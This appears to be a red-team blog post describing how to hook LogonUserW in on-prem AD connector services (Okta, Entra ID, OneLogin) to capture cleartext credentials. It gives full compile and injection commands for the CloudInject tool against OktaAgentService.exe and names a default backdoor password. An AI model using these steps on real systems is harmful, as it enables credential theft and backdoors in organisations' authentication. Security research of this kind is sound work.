Offensive SaaS Security - Exfiltrating Cleartext Credentials via LogonUserW Hooking

Recap

IAM Providers such as Azure AD (Entra ID), Okta, and OneLogin are vulnerable to a type of red team attack technique known as LogonUserW hooking.

LogonUserW is an unmanaged Win32 API. Many IAM providers rely on this functionality to implement delegated authentication flows, which facilitate user implementation of SSO on the cloud without the need to upload all their domain credentials. This is achieved by delegating authentication to on-prem AD through their agent connectors running in the domain.

However, despite the dependency of many IAM providers on this API to implement delegated authentication, there is an unavoidable flaw: all credentials passed to this API are in cleartext, which is originally found by @XPN.

img

Therefore, attackers can manage to hook LogonUserW to directly capture user’s cleartext credentials and even leave backdoors in the authentication flow.

You can observe this behavior in x64dbg by attaching to the connector’s process and setting a breakpoint at LoginUserW in the advapi32.dll.

Untitled

After you do that, you can observe the cleartext credential when a user login attempt happens.

Untitled

Requirements

  • Compromise a machine running an AD connector. Vulnerable AD connectors include:
    • Entra ID Connector with Pass-Through Authentication mode
    • Okta AD Connector with Delegated Authentication mode
    • OneLogin AD Connector
  • Ensure the controllable user running on the compromised machine has SeDebugPrivilege, which is typically owned by local administrators.

Exploit

Overview

The risk is raised by the use of the unmanaged Win32 API LogonUserW across various IAM providers, and the method of exploitation remains the same regardless of the provider. Here, I will walk you through this attack using the case of Okta AD.

Tool

CloudInject: https://github.com/xpn/CloudInject

Steps for Exploiting OKTA AD Connector:

  • Compile the CloudInject Ensure to place the hooker in a shared folder.
1
2
x86_64-w64-mingw32-g++.exe .\Injector\injector.cpp -o .\Injector\injector.exe -static
x86_64-w64-mingw32-g++.exe .\hooker\hooker.cpp -o C:\hooker.dll -static -shared
  • Locate the PID of OktaAgentService.exe .
1
2
3
4
5
6
PS C:\Users\Administrator\Desktop\cloudinject\CloudInject-main> tasklist /FI  "IMA
GENAME eq OKTA*"

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
OktaAgentService.exe          6560 Services                   0     56,860 K
  • Use Injector.exe to inject the hooker.dll into OktaAgentService.exe
1
.\Injector\injector.exe 6560 C:\hooker.dll

Untitled

  • Under okta’s delegated authentication mode, every login request through okta SSO is forwarded to on-prem AD. Once the hooker is successfully injected, it intercepts and captures the cleartext credential of every login attempt.

Untitled

  • Furthermore, the hooker leaves a universal password backdoor, which is OnePasswordToRuleThemAll! by default:

Untitled

Untitled

Conclusion

The exploitation of the LogonUserW API across various IAM platforms, including Azure AD, Okta, and OneLogin, highlights a significant and universal vulnerability within these systems. By capitalizing on this flaw, attackers are able to capture cleartext credentials and implant backdoors, threatening the integrity and security of delegated authentication processes.